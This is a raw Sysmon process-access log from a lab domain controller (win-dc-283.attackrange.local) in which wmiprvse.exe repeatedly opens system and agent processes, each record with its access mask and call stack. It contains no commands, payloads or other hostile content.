15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024212Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024211Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024210Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024209Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024208Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024207Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024206Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024205Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024204Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024203Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024202Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024201Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024200Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024199Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024198Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024197Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024196Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024195Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.351{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024194Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024193Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 